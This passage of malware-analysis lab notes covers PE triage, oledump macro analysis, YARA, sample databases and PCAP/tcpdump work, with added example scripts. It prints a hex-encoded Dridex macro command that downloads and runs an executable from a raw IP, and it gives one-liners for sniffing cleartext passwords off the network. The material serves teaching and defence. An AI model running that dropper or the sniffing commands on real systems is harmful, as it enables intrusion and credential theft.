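    [ "$(hex_at 0 2 "$f")" = "4d5a" ] || { printf 'not-mz\n'; return; }
    off=$(le32_at 60 "$f")                     # e_lfanew lives at 0x3c
    [ "$(hex_at "$off" 4 "$f")" = "50450000" ] || { printf 'mz-no-pe\n'; return; }
    case "$(hex_at $((off + 4)) 2 "$f")" in    # IMAGE_FILE_HEADER.Machine, LE bytes
        4c01) m=i386 ;;
        6486) m=x86-64 ;;
        64aa) m=arm64 ;;
        *)    m=unknown ;;
    esac
    printf 'pe %s\n' "$m"
}

# Write a constructed, minimal PE-like file: MZ, zero padding, e_lfanew=0x40,
# PE signature, Machine=0x014c, then a couple of the strings the lab greps for.
write_sample_pe() {
    {
        printf 'MZ'
        dd if=/dev/zero bs=58 count=1 2>/dev/null     # bytes 2..59
        printf '\100\000\000\000'                      # e_lfanew = 0x40
        printf 'PE\000\000'                            # NT signature at 0x40
        printf '\114\001'                              # Machine 0x014c (i386)
        printf 'kernel32.dll\000WANACRY!\000'
    } > "$1"
}

# Demo: the constructed PE, a plain text file, and a file that starts with
# MZ but has no PE header, classified in turn.
classify_demo() {
    d=$(mktemp -d) || return 1
    write_sample_pe "$d/sample.exe"
    printf 'just text\n' > "$d/note.txt"
    { printf 'MZ'; dd if=/dev/zero bs=126 count=1 2>/dev/null; } > "$d/old.com"
    for f in sample.exe note.txt old.com; do
        printf '%s: %s\n' "$f" "$(classify_pe "$d/$f")"
    done
    rm -rf "$d"
}
```

The Machine value is the first real fact you learn about a sample beyond "it is a PE": a 32-bit i386 image and an x86-64 image need different sandboxes, and a mismatch between the Machine field and what the file name or the submitter claimed is itself a finding.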
####################################
# Tired of GREP - let's try Python #
####################################
Decided to make my own script for this kind of stuff in the future. I

Reference1:
https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py

This is a really good script for the basics of static analysis

Reference:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html


This is really good for showing some good signatures to add to the Python script


Here is my own script using the signatures (started this yesterday, but still needs work):
https://pastebin.com/guxzCBmP



---------------------------Type This-----------------------------------
sudo apt install -y python-pefile
infosecaddicts                 <---- the sudo password on this VM

wget https://pastebin.com/raw/guxzCBmP

mv guxzCBmP am.py

vi am.py                       <---- read it before you run it

python am.py wannacry.exe
-----------------------------------------------------------------------




Building a Malware Scanner
--------------------------

---------------------------Type This-----------------------------------
mkdir ~/Desktop/malwarescanner

cd ~/Desktop/malwarescanner

wget https://github.com/jonahbaron/malwarescanner/archive/master.zip

unzip master.zip

cd malwarescanner-master/

python scanner.py -h

cat strings.txt

cat hashes.txt

mkdir ~/Desktop/malcode

cp ~/Desktop/malware.exe ~/Desktop/malcode

python scanner.py -H hashes.txt -D ~/Desktop/malcode/ strings.txt

cd ~/Desktop/
-----------------------------------------------------------------------


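The scanner above takes a hash list and a strings list and walks a directory. As an added example (my own, not jonahbaron's scanner or the lab's files), here is the same idea in shell: it hashes every file under a directory with sha256sum and flags any whose digest is on a blocklist, then extracts printable strings the way strings does (with tr, so it needs no binutils) and flags files containing any indicator from a strings list, case-insensitively, the way the grep -i hunting above did by hand. The demo builds its own tiny "sample" carrying the WANACRY! marker from the YARA rule; the blocklist it checks against is computed from that constructed file, not a real WannaCry hash.

```shell
#!/bin/sh
# Added example: hash-blocklist + indicator-string scanner.

# Printable runs of 4+ characters, like strings(1) but with only tr/grep.
extract_strings() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '.{4,}'
}

# Scan every regular file under $1. $2 is a file of sha256 digests (one per
# line), $3 a file of indicator strings (one per line). Emits
#   hash-match <file>             digest is on the blocklist
#   string-match <file> <string>  file contains the indicator (case-insensitive)
scan_dir() {
    dir=$1; hashes=$2; indicators=$3
    find "$dir" -type f | LC_ALL=C sort | while IFS= read -r f; do
        name=${f#"$dir"/}
        digest=$(sha256sum "$f" | cut -d' ' -f1)
        if grep -qiF -- "$digest" "$hashes"; then
            printf 'hash-match %s\n' "$name"
        fi
        found=$(extract_strings "$f")
        while IFS= read -r ind; do
            [ -n "$ind" ] || continue
            if printf '%s\n' "$found" | grep -qiF -- "$ind"; then
                printf 'string-match %s %s\n' "$name" "$ind"
            fi
        done < "$indicators"
    done
}

# Demo on a constructed tree: one "sample" carrying a marker string and a
# clean file. The blocklist is seeded with the sample's own digest.
scanner_demo() {
    d=$(mktemp -d) || return 1
    mkdir "$d/scan"
    printf 'MZ\000\000junk\000\000WANACRY!\000more\000' > "$d/scan/bad.bin"
    printf 'quarterly report, nothing to see\n'          > "$d/scan/clean.txt"
    sha256sum "$d/scan/bad.bin" | cut -d' ' -f1 > "$d/hashes.txt"
    printf '%s\n' 'Wanna Decryptor' 'WANACRY!' '.wcry'   > "$d/strings.txt"
    scan_dir "$d/scan" "$d/hashes.txt" "$d/strings.txt"
    rm -rf "$d"
}
```

Hash matches are exact and therefore brittle (one byte changed and the digest is gone), string matches are broad and therefore noisy; a scanner reports both and lets the analyst weigh them, which is also how the YARA rule above combines several strings rather than relying on one.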
  993. #####################################################
  994. # Analyzing Macro Embedded Malware #
  995. # Reference: #
  996. # https://jon.glass/analyzes-dridex-malware-p1/ #
  997. #####################################################
  998. ---------------------------Type This-----------------------------------
  999. cd ~/Desktop/
  1000.  
  1001.  
  1002. sudo pip install olefile
  1003.  
  1004.  
  1005. mkdir ~/Desktop/oledump
  1006.  
  1007. cd ~/Desktop/oledump
  1008.  
  1009. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1010.  
  1011. unzip oledump_V0_0_22.zip
  1012.  
  1013. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  1014.  
  1015. unzip 064016.zip
  1016. infected
  1017.  
  1018. python oledump.py 064016.doc
  1019.  
  1020. python oledump.py 064016.doc -s A4 -v
  1021. -----------------------------------------------------------------------
  1022.  
  1023.  
  1024.  
  1025. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  1026. - Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
  1027.  
  1028. ---------------------------Type This-----------------------------------
  1029. python oledump.py 064016.doc -s A5 -v
  1030. -----------------------------------------------------------------------
  1031.  
  1032. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1033.  
  1034. ---------------------------Type This-----------------------------------
  1035. python oledump.py 064016.doc -s A3 -v
  1036. -----------------------------------------------------------------------
  1037. - Look for "GVhkjbjv" and you should see:
  1038.  
  1039. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  1040.  
  1041. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1042. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
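The hex-to-ASCII step can be done locally instead of pasting the blob into a web form. This added example (Python 3, not part of the lab or of oledump) pulls every long hex run out of a macro dump such as the `-s A3 -v` output, decodes it, and lists any URLs in the decoded text as indicators to record; the sample VBA text and its harmless hex payload are constructed, and the 40-character minimum run length is an assumption.

```python
#!/usr/bin/env python3
"""Find and decode hex-encoded strings in a dumped VBA macro."""
import re

# Runs of hex digits of even length and at least this many characters are
# treated as candidate encoded strings; shorter runs are usually GUIDs or
# colour values, so the threshold keeps the noise down (assumed value).
MIN_HEX_CHARS = 40
HEX_RUN = re.compile(
    r"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){%d,})(?![0-9A-Fa-f])" % (MIN_HEX_CHARS // 2)
)
URL = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def decode_hex_blob(blob):
    """Decode a hex string to text; non-printable bytes become '.' like strings(1)."""
    raw = bytes.fromhex(blob)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


def find_encoded_strings(vba_source):
    """Return (hex, decoded) pairs for every long hex run in a macro dump."""
    results = []
    for match in HEX_RUN.finditer(vba_source):
        blob = match.group(1)
        results.append((blob, decode_hex_blob(blob)))
    return results


def extract_urls(text):
    """Pull URLs out of decoded text so they can be recorded as indicators."""
    return sorted(set(URL.findall(text)))


# Constructed sample shaped like the oledump -v output of a VBA module: an
# obfuscated-looking variable holding a hex string. The payload is harmless
# text (it only echoes), not the real macro's content.
SAMPLE_VBA = '''
Sub AutoOpen()
    Dim GVhkjbjv As String
    GVhkjbjv = "%s"
    Call RunIt(GVhkjbjv)
End Sub
''' % "cmd /K echo hello from http://example.invalid/test.txt".encode().hex()

if __name__ == "__main__":
    for blob, decoded in find_encoded_strings(SAMPLE_VBA):
        print("hex : %s...%s (%d bytes)" % (blob[:8], blob[-8:], len(blob) // 2))
        print("text: %s" % decoded)
        print("urls: %s" % extract_urls(decoded))
```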
  1043.  
  1044.  
  1045.  
  1046.  
  1047. ##############
  1048. # Yara Ninja #
  1049. ##############
  1050. ---------------------------Type This-----------------------------------
  1051. sudo apt-get remove -y yara
  1052.  
  1053.  
  1054. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  1055.  
  1056. sudo apt-get -y install libtool
  1057.  
  1058.  
  1059. unzip v3.4.0.zip
  1060.  
  1061. cd yara-3.4.0
  1062.  
  1063. ./bootstrap.sh
  1064.  
  1065. ./configure
  1066.  
  1067. make
  1068.  
  1069. sudo make install
  1070.  
  1071.  
  1072. yara -v
  1073.  
  1074. cd ..
  1075.  
  1076. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1077.  
  1078. unzip master.zip
  1079.  
  1080. cd ~/Desktop
  1081.  
  1082. yara rules-master/packer.yar malcode/malware.exe
  1083. -----------------------------------------------------------------------
  1084.  
  1085. Places to get more Yara rules:
  1086. ------------------------------
  1087. https://malwareconfig.com/static/yaraRules/
  1088. https://github.com/kevthehermit/YaraRules
  1089. https://github.com/VectraThreatLab/reyara
  1090.  
  1091.  
  1092.  
  1093. Yara rule sorting script:
  1094. -------------------------
  1095. https://github.com/mkayoh/yarasorter
  1096.  
  1097.  
  1098. ---------------------------Type This-----------------------------------
  1099. cd ~/Desktop/rules-master
  1100. for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
  1101. cd ~/Desktop/
  1102. yara rules-master/master.yar malcode/malware.exe
  1103. -----------------------------------------------------------------------
  1104.  
  1105.  
  1106.  
  1107.  
  1108.  
  1109.  
  1110.  
  1111.  
  1112.  
  1113. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  1114. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  1115.  
  1116.  
  1117. Malware Repositories:
  1118. http://malshare.com/index.php
  1119. http://www.malwareblacklist.com/
  1120. http://www.virusign.com/
  1121. http://virusshare.com/
  1122. http://www.tekdefense.com/downloads/malware-samples/
  1123.  
  1124.  
  1125.  
  1126.  
  1127. ###############################
  1128. # Creating a Malware Database #
  1129. ###############################
  1130.  
  1131. Creating a malware database (sqlite)
  1132. ---------------------------Type This-----------------------------------
  1133. sudo apt-get install -y python-simplejson python-simplejson-dbg
  1134.  
  1135.  
  1136. wget https://s3.amazonaws.com/infosecaddictsfiles/avsubmit.py
  1137. wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
  1138.  
  1139. unzip malware-password-is-infected.zip
  1140. infected
  1141.  
  1142. python avsubmit.py --init
  1143.  
  1144. python avsubmit.py -f malware.exe -e
  1145. -----------------------------------------------------------------------
  1146.  
  1147.  
  1148.  
  1149.  
  1150. Creating a malware database (mysql)
  1151. -----------------------------------
  1152. - Step 1: Installing MySQL database
  1153. - Run the following command in the terminal:
  1154. ---------------------------Type This-----------------------------------
  1155. sudo apt-get install mysql-server
  1156.  
  1157.  
  1158. - Step 2: Installing Python MySQLdb module
  1159. - Run the following command in the terminal:
  1160. ---------------------------Type This-----------------------------------
  1161. sudo apt-get build-dep python-mysqldb
  1162.  
  1163.  
  1164. sudo apt-get install python-mysqldb
  1165.  
  1166. -----------------------------------------------------------------------
  1167.  
  1168. Step 3: Logging in
  1169. Run the following command in the terminal:
  1170. ---------------------------Type This-----------------------------------
  1171. mysql -u root -p (set a password of 'malware')
  1172.  
  1173. - Then create one database by running following command:
  1174. ---------------------------Type This-----------------------------------
  1175. create database malware;
  1176.  
  1177. exit;
  1178.  
  1179. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1180.  
  1181. vi mal_to_db.py (fill in database connection information)
  1182.  
  1183. python mal_to_db.py -i
  1184. -----------------------------------------------------------------------
  1185.  
  1186. ------- check it to see if the files table was created ------
  1187.  
  1188. mysql -u root -p
  1189. malware
  1190.  
  1191. show databases;
  1192.  
  1193. use malware;
  1194.  
  1195. show tables;
  1196.  
  1197. describe files;
  1198.  
  1199. exit;
  1200.  
  1201. ---------------------------------
  1202.  
  1203.  
  1204. - Now add the malicious file to the DB
  1205. ---------------------------Type This-----------------------------------
  1206. python mal_to_db.py -f malware.exe -u
  1207. -----------------------------------------------------------------------
  1208.  
  1209.  
  1210. - Now check to see if it is in the DB
  1211. ---------------------------Type This-----------------------------------
  1212. mysql -u root -p
  1213. malware
  1214.  
  1215. mysql> use malware;
  1216.  
  1217. select id,md5,sha1,sha256,time FROM files;
  1218.  
  1219. mysql> quit;
  1220. ------------------------------------------------------------------------
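To show what avsubmit.py --init / mal_to_db.py -i and -u do under the hood, here is an added Python 3 example (not the lab's scripts) that builds the same kind of files table in SQLite, inserts a sample's MD5/SHA-1/SHA-256 with a timestamp, refuses duplicate rows, and runs the id,md5,sha1,sha256,time query from the check above. The exact column types and the UNIQUE constraint on sha256 are assumptions.

```python
#!/usr/bin/env python3
"""A small hash database in SQLite, in the spirit of mal_to_db.py."""
import hashlib
import sqlite3
import time

# Assumed table layout, mirroring only the columns the lab's SELECT reads
# (id, md5, sha1, sha256, time); mal_to_db.py's real schema may differ.
SCHEMA = """
CREATE TABLE IF NOT EXISTS files (
    id     INTEGER PRIMARY KEY AUTOINCREMENT,
    md5    TEXT NOT NULL,
    sha1   TEXT NOT NULL,
    sha256 TEXT NOT NULL UNIQUE,
    time   TEXT NOT NULL
)
"""


def init_db(path=":memory:"):
    """Create the files table (the equivalent of 'python mal_to_db.py -i')."""
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    conn.commit()
    return conn


def hash_bytes(data):
    """All three digests the table stores, as lowercase hex."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def hash_file(path):
    """Digests of a file on disk (e.g. the lab's malware.exe)."""
    with open(path, "rb") as fh:
        return hash_bytes(fh.read())


def add_sample(conn, digests, when=None):
    """Insert one sample (like 'mal_to_db.py -f malware.exe -u').

    Returns (row_id, inserted); inserted is False when the sha256 is already
    present, so re-submitting the same file does not create duplicate rows.
    """
    when = when or time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
    existing = conn.execute(
        "SELECT id FROM files WHERE sha256 = ?", (digests["sha256"],)
    ).fetchone()
    if existing:
        return existing[0], False
    cur = conn.execute(
        "INSERT INTO files (md5, sha1, sha256, time) VALUES (?, ?, ?, ?)",
        (digests["md5"], digests["sha1"], digests["sha256"], when),
    )
    conn.commit()
    return cur.lastrowid, True


def lookup(conn, digest):
    """Find a row by md5, sha1 or sha256 (case-insensitive); None if unknown."""
    digest = digest.strip().lower()
    return conn.execute(
        "SELECT id, md5, sha1, sha256, time FROM files "
        "WHERE md5 = ? OR sha1 = ? OR sha256 = ?",
        (digest, digest, digest),
    ).fetchone()


def list_samples(conn):
    """The query the lab runs by hand: select id,md5,sha1,sha256,time FROM files."""
    return conn.execute(
        "SELECT id, md5, sha1, sha256, time FROM files ORDER BY id"
    ).fetchall()


if __name__ == "__main__":
    db = init_db("malware.sqlite")
    # Constructed stand-in for malware.exe so the script runs without a sample.
    digests = hash_bytes(b"MZ constructed sample, not real malware")
    row_id, inserted = add_sample(db, digests)
    print("row %d %s" % (row_id, "inserted" if inserted else "already present"))
    for row in list_samples(db):
        print(row)
```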
  1221.  
  1222.  
  1223.  
  1224.  
  1225. #################
  1226. # PCAP Analysis #
  1227. #################
  1228. ---------------------------Type This-----------------------------------
  1229. cd ~/Desktop/
  1230.  
  1231. mkdir suspiciouspcap/
  1232.  
  1233. cd suspiciouspcap/
  1234.  
  1235. wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
  1236.  
  1237. wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
  1238.  
  1239.  
  1240. perl chaosreader.pl suspicious-time.pcap
  1241.  
  1242. firefox index.html
  1243.  
  1244. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1245.  
  1246. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1247.  
  1248.  
  1249. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1250. ------------------------------------------------------------------------
  1251.  
  1252.  
  1253.  
  1254. ####################
  1255. # Intro to TCPDump #
  1256. ####################
  1257. ---------------------------Type This-----------------------------------
  1258. sudo apt-get install tcpdump
  1259.  
  1260.  
  1261.  
  1262. Basic sniffing
  1263. --------------
  1264. ---------------------------Type This-----------------------------------
  1265. sudo tcpdump -n
  1266.  
  1267.  
  1268. Now let's increase the level of detail shown for each packet. The verbose switch (-v) comes in handy.
  1269. ---------------------------Type This-----------------------------------
  1270. sudo tcpdump -v -n
  1271.  
  1272.  
  1273.  
  1274. Getting the ethernet header (link layer headers)
  1275. ------------------------------------------------
  1276. In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.
  1277. ---------------------------Type This-----------------------------------
  1278. sudo tcpdump -vv -n -e
  1279. ------------------------------------------------------------------------
  1280.  
  1281. Sniffing a particular interface
  1282. -------------------------------
  1283. In order to sniff a particular network interface we must specify it with the -i switch. First let's get the list of available interfaces using the -D switch.
  1284. ---------------------------Type This-----------------------------------
  1285. sudo tcpdump -D
  1286. ------------------------------------------------------------------------
  1287.  
  1288. Filtering packets using expressions - Selecting protocols
  1289. ---------------------------------------------------------
  1290. ---------------------------Type This-----------------------------------
  1291. $ sudo tcpdump -n tcp
  1292. ------------------------------------------------------------------------
  1293.  
  1294. Particular host or port
  1295. -----------------------
  1296. Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address 192.168.1.101
  1297. ---------------------------Type This-----------------------------------
  1298. $ sudo tcpdump -n 'src 192.168.1.101'
  1299. ------------------------------------------------------------------------
  1300.  
  1301. The next example picks up DNS request packets, i.e. packets that originate from the local machine and go to port 53 of some other machine.
  1302. ---------------------------Type This-----------------------------------
  1303. $ sudo tcpdump -n 'udp and dst port 53'
  1304. ------------------------------------------------------------------------
  1305.  
  1306. To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
  1307. ---------------------------Type This-----------------------------------
  1308. $ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
  1309. ------------------------------------------------------------------------
  1310.  
  1311. Search the network traffic using grep
  1312.  
  1313. Grep can be used along with tcpdump to search the network traffic. Here is a very simple example:
  1314. ---------------------------Type This-----------------------------------
  1315. $ sudo tcpdump -n -A | grep -e 'POST'
  1316. ------------------------------------------------------------------------
  1317.  
  1318. So what is the idea behind searching packets? Well, one useful thing is to sniff passwords.
  1319. Here is a quick example of sniffing passwords using egrep:
  1320.  
  1321. ---------------------------Type This-----------------------------------
  1322. tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
  1323. ------------------------------------------------------------------------
  1324.  
  1325.  
  1326.  
  1327. #########
  1328. # NGrep #
  1329. #########
  1330.  
  1331. Install ngrep on Ubuntu
  1332. ---------------------------Type This-----------------------------------
  1333. $ sudo apt-get install ngrep
  1334. ------------------------------------------------------------------------
  1335.  
  1336. Search network traffic for string "User-Agent: "
  1337. ---------------------------Type This-----------------------------------
  1338. $ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
  1339. ------------------------------------------------------------------------
  1340. In the above command:
  1341. a) tcp and port 80 is the BPF (Berkeley Packet Filter) expression; it sniffs only TCP packets with port number 80.
  1342. b) The -d option specifies the interface to sniff, eth0 in this case.
  1343. c) "User-Agent: " is the string to search for. All packets that contain that string are displayed.
  1344.  
  1345. 2. Search network packets for GET or POST requests:
  1346. ---------------------------Type This-----------------------------------
  1347. $ sudo ngrep -l -q -d eth0 "^GET |^POST " tcp and port 80
  1348. ------------------------------------------------------------------------
  1349. The -l option makes stdout line-buffered and the -q option is for quiet (be quiet; don't output any information other than packet headers and their payloads, if relevant).
  1350.  
  1351. 3. ngrep without any options would simply capture all packets.
  1352. ---------------------------Type This-----------------------------------
  1353. $ sudo ngrep
  1354. ------------------------------------------------------------------------
  1355.  
  1356. Reference:
  1357. https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
  1358. ---------------------------Type This-----------------------------------
  1359. $ sudo ngrep -d eth0 -n 3
  1360.  
  1361. $ sudo ngrep -d any port 25
  1362. ------------------------------------------------------------------------
  1363.  
  1364. This will let you monitor all activity crossing source or destination port 25
  1365. (SMTP).
  1366. ---------------------------Type This-----------------------------------
  1367. $ sudo ngrep -wi -d wlan0 'user|pass' port 6667
  1368.  
  1369. $ sudo ngrep -wi -d any 'user|pass' port 21
  1370. ------------------------------------------------------------------------
  1371.  
  1372.  
  1373.  
  1374.  
  1375.  
  1376. #############################
  1377. # PCAP Analysis with tshark #
  1378. #############################
  1379. ---------------------------Type This-----------------------------------
  1380. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  1381.  
  1382.  
  1383. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1384.  
  1385.  
  1386. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1387.  
  1388.  
  1389. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  1390.  
  1391.  
  1392. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
  1393.  
  1394.  
  1395. tshark -r suspicious-time.pcap -Y "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  1396.  
  1397. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  1398.  
  1399. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1400.  
  1401. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1402.  
  1403. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1404.  
  1405.  
  1406. whois rapidshare.com.eyu32.ru
  1407.  
  1408. whois sploitme.com.cn
  1409.  
  1410.  
  1411. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1412.  
  1413. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1414.  
  1415. tshark -r suspicious-time.pcap -qz http_req,tree
  1416.  
  1417. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1418.  
  1419. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1420.  
  1421.  
  1422.  
  1423. ######################################
  1424. # PCAP Analysis with forensicPCAP.py #
  1425. ######################################
  1426. ---------------------------Type This-----------------------------------
  1427. cd ~/Desktop/suspiciouspcap/
  1428.  
  1429. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1430.  
  1431. sudo pip install cmd2==0.7.9
  1432.  
  1433.  
  1434. python forensicPCAP.py suspicious-time.pcap
  1435. ------------------------------------------------------------------------
  1436.  
  1437.  
  1438. ---------------------------Type This-----------------------------------
  1439. ForPCAP >>> help
  1440. ------------------------------------------------------------------------
  1441.  
  1442. Prints stats about PCAP
  1443. ---------------------------Type This-----------------------------------
  1444. ForPCAP >>> stat
  1445. ------------------------------------------------------------------------
  1446.  
  1447. Prints all DNS requests from the PCAP file. The id before each DNS request is the packet's id, which can be used with the "show" command.
  1448. ---------------------------Type This-----------------------------------
  1449. ForPCAP >>> dns
  1450.  
  1451. ForPCAP >>> show
  1452. ------------------------------------------------------------------------
  1453.  
  1454. Prints all destination ports from the PCAP file. The id before each port is the packet's id, which can be used with the "show" command.
  1455. ---------------------------Type This-----------------------------------
  1456. ForPCAP >>> dstports
  1457.  
  1458. ForPCAP >>> show
  1459. ------------------------------------------------------------------------
  1460.  
  1461. Prints the number of source IPs and stores them.
  1462. ---------------------------Type This-----------------------------------
  1463. ForPCAP >>> ipsrc
  1464.  
  1465. ForPCAP >>> show
  1466. ------------------------------------------------------------------------
  1467. Prints the number of web requests and stores them.
  1468. ---------------------------Type This-----------------------------------
  1469. ForPCAP >>> web
  1470.  
  1471. ForPCAP >>> show
  1472. ------------------------------------------------------------------------
  1473.  
  1474.  
  1475. Prints the number of mail requests and stores them.
  1476. ---------------------------Type This-----------------------------------
  1477. ForPCAP >>> mail
  1478.  
  1479. ForPCAP >>> show
  1480. ------------------------------------------------------------------------
  1481.  
  1482.  
  1483.  
  1484.  
  1485.  
  1486. #############################
  1487. # Understanding Snort rules #
  1488. #############################
  1489. Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
  1490.  
  1491. Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
  1492.  
  1493. Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
  1494.  
  1495. Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  1496.  
  1497. Field 5: Traffic Direction (->)
  1498.  
  1499. Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
  1500.  
  1501. Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  1502.  
  1503. Field 8: MSG - what is actually displayed on the analyst's machine
  1504.  
  1505.  
  1506. Let's look at 2 simple rules
  1507. ----------------------------------------------------------------------------------
  1508. alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator \
  1509. bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; \
  1510. content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 \
  1511. 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; \
  1512. reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
  1513.  
  1514. alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivator bind \
  1515. attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; \
  1516. depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c \
  1517. 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; \
  1518. distance:0; within:1; content:"|0b|"; distance:1; within:1; \
  1519. byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
  1520. 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
  1521. sid:2193; rev:1;)
  1522. ----------------------------------------------------------------------------------
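To make the eight fields concrete, this added example (Python 3, not from the page or from Snort itself) parses the first rule above into its seven header fields and its option list, and summarises msg, sid, rev and the content matches. It assumes rules are wrapped with trailing backslashes as shown and does not handle escaped quotes inside msg strings.

```python
#!/usr/bin/env python3
"""Split a Snort rule into header fields and options."""

HEADER_FIELDS = ["action", "protocol", "src_ip", "src_port",
                 "direction", "dst_ip", "dst_port"]

# First rule from the section above (sid 2192), kept with its
# line-continuation backslashes exactly as a rules file would carry them.
RULE_2192 = r'''
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator \
bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; \
content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 \
00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; \
reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
'''


def _split_options(body):
    """Split the option body on ';' characters that sit outside double quotes."""
    parts, current, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            parts.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    tail = "".join(current).strip()
    if tail:
        parts.append(tail)
    return [p for p in parts if p]


def parse_snort_rule(rule_text):
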